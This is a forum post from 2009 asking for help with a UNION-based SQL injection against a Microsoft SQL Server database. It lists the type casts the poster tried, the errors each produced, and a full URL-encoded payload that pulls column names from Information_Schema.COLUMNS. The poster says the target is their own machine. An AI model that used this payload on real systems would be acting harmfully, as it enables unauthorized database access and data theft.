• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

SQL Injection - types changing

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Databases

View previous topic :: View next topic  
Author Message
gizard
Just Arrived
Just Arrived


Joined: 26 Mar 2009
Posts: 0


Offline

PostPosted: Thu Mar 26, 2009 2:25 pm    Post subject: SQL Injection - types changing Reply with quote

Hi All, have you every come across an SQL injection where the datatype appears to change?

for example a simple union exploit where the datatypes require casting. However one cast keeps changing it's mind.

when I cast to money it says it's a text
When I cast to text it says conversion from nvarchar to money is not allowed.

It's as if the datatype changes everytime? However I have tried refreshing the same thing over and over and the SQL seams to remain static, so I don't think this is model logic changing the query.

There are 4 arguments to the SQL and two are defo nvarchar. I have tried the following with the given errors.

int, nvarchar,nvarchar,int text is incompatible with int
int, nvarchar,nvarchar,money text is incompatible with money
int, nvarchar,nvarchar,nvarchar Implicit conversion from data type nvarchar to money is not allowed. Use the CONVERT function to run this query.

money,nvarchar, nvarchar, int text is incompatible with int
money,nvarchar,nvarchar,money text is incompatible with money
money,nvarchar,nvarchar,nvarchar Implicit conversion from data type nvarchar to money is not allowed. Use the CONVERT function to run this query.

nvarchar,nvarchar,nvarchar,int text is incompatible with int
nvarchar,nvarchar,nvarchar,money text is incompatible with money
nvarchar,nvarchar,nvarchar,nvarchar Implicit conversion from data type nvarchar to money is not allowed. Use the CONVERT function to run this query.

The URL looks like this:
?id=-1%20union%20all%20select%20top%201%20convert(int,%271%27),convert(nvarchar(100),COLUMN_NAME%20COLLATE%20SQL_Latin1_General_CP1_CI_AS),convert(int,%273%27),cast(%279.99%27%20as%20money)%20from%20Information_Schema.COLUMNS%20where%201=1%20--

any help would be great, I am not going to sleep until I have figured this out.

PS This is my own box!
The data is: int, nvarchar,nvarchar,money
Back to top
View user's profile Send private message
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Databases All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register